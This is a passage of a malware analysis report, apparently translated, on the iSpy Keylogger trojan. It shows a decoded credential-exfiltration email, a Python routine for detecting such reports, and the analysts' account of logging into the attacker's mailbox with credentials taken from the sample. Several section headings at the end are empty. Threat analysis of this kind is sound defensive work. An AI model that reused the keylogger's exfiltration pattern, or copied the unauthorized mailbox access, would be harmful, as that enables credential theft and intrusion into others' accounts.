Analysis of the trojan's configuration shows that in this sample its main purpose is password theft (the other feature options are not configured), and it is configured to upload the collected user credentials via EMAIL.

0x02 Password stealing

The collected user credentials are exfiltrated by email:

Figure 7: Wireshark capture

The captured network traffic shows that the message content is base64-encoded; decoded, it reads as follows:

Dear iSpy Keylogger Customers,
Let us informed you that iSpy Keylogger is currently active now.
Best Regards
iSpySoft Admin
*********** Computer Information ***********
Username: WIN-86JN3PJSB51
Windows Installed: Microsoft Windows 7 家庭普通版
Local Date & Time: 2016/4/22 16:13:13
Installed Language: zh-CN
.NET Framework Installed: 2, 4
System Privileges: User
Default Browser: Not found!
Installed Anti-Virus:
Installed Firewall:
Internal IP: 192.168.78.130
External IP:
*********** Computer Information ***********
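As an added example (not part of the original write-up), this Python code decodes a base64-encoded SMTP body and extracts the key/value "Computer Information" block the implant emails, returning an empty result when the iSpy banner is absent so the same routine can be applied as a check over decoded mail bodies. The SMTP fragment is constructed here from a shortened, fictitious report (the host name is a placeholder), and the function names are mine.

```python
import base64
import re
from typing import Dict

BANNER = "iSpy Keylogger"

# Constructed plaintext in the shape of the decoded report above (host name is
# a placeholder); the SMTP DATA fragment is built from it so the sample is
# self-consistent and can be decoded offline.
_REPORT = (
    "Dear iSpy Keylogger Customers,\r\n"
    "Let us informed you that iSpy Keylogger is currently active now.\r\n"
    "Best Regards\r\n"
    "iSpySoft Admin\r\n"
    "*********** Computer Information ***********\r\n"
    "Username: WIN-EXAMPLE\r\n"
    "Windows Installed: Microsoft Windows 7\r\n"
    "Local Date & Time: 2016/4/22 16:13:13\r\n"
    "System Privileges: User\r\n"
    "Internal IP: 192.168.78.130\r\n"
    "External IP:\r\n"
    "*********** Computer Information ***********\r\n"
)
SMTP_DATA = (
    "Subject: iSpy Keylogger\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n"
    + base64.b64encode(_REPORT.encode()).decode()
    + "\r\n.\r\n"
)

# "Key: value" lines; keys may contain spaces, '&' and a leading '.' (.NET).
FIELD = re.compile(r"^([A-Za-z.& ]+?):\s*(.*)$")


def decode_body(smtp_data: str) -> str:
    """Split headers from body and base64-decode the body when the
    Content-Transfer-Encoding header says so, joining wrapped lines and
    dropping the terminating '.' line of the SMTP DATA phase."""
    headers, _, body = smtp_data.partition("\r\n\r\n")
    if "base64" not in headers.lower():
        return body
    joined = "".join(l for l in body.split("\r\n") if l and l != ".")
    return base64.b64decode(joined).decode("utf-8", errors="replace")


def parse_report(text: str) -> Dict[str, str]:
    """Return the key/value pairs between the '*** Computer Information ***'
    markers, or an empty dict when the iSpy banner is absent."""
    if BANNER not in text:
        return {}
    fields: Dict[str, str] = {}
    in_block = False
    for line in text.splitlines():
        if line.startswith("***"):
            in_block = not in_block  # markers open and close the block
            continue
        m = FIELD.match(line) if in_block else None
        if m:
            fields[m.group(1)] = m.group(2)
    return fields
```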

 

Using the EMAIL settings from the configuration, we logged into the attacker's mailbox, which already contains harvested user information:

 

Figure 8: Attacker's mailbox

0x03 Sample tracking

The iSpySoft trojan first appeared on January 27, 2016. It has since developed into a powerful trojan, and the latest version's code has been processed with the ConfuserEx v0.6.0 obfuscator.

0x04 Behavior analysis

0x05 Attack target identification

0x06 System detection

 
